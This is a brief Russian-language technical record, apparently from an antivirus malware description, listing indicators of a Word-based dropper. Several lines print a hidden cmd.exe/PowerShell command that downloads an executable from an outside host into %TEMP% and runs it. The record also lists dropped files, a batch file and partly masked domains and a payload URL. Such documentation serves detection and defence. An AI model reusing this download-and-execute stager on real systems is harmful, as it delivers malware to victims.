Техническая информация
- $mmozyywr как %temp%\swtdxdzt.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function mzmydzaf5([String] $Mmozyywr){(New-Object System.Net.WebClient).DownloadFile($Mmozyywr,''%TMP%\swtdxdzt.exe'');Start-Process ''%TMP%\swtdxdzt.exe'';}try{mz...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\gbwgfn.bat
- %TEMP%\1016081.cvr
- 'ev##ts4u.cz':80
- http://www.ev##ts4u.cz/ser925.png
- DNS ASK ev##ts4u.cz
- DNS ASK tr#####ha-dinnie.co.uk
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function mzmydzaf5([String] $Mmozyywr){(New-Object System.Net.WebClient).DownloadFile($Mmozyywr,''%TMP%\swtdxdzt.exe'');Start-Process ''%TMP%\swtdxdzt.exe'';}try{mz...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\gbwgfn.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\gbwgfn.bat" "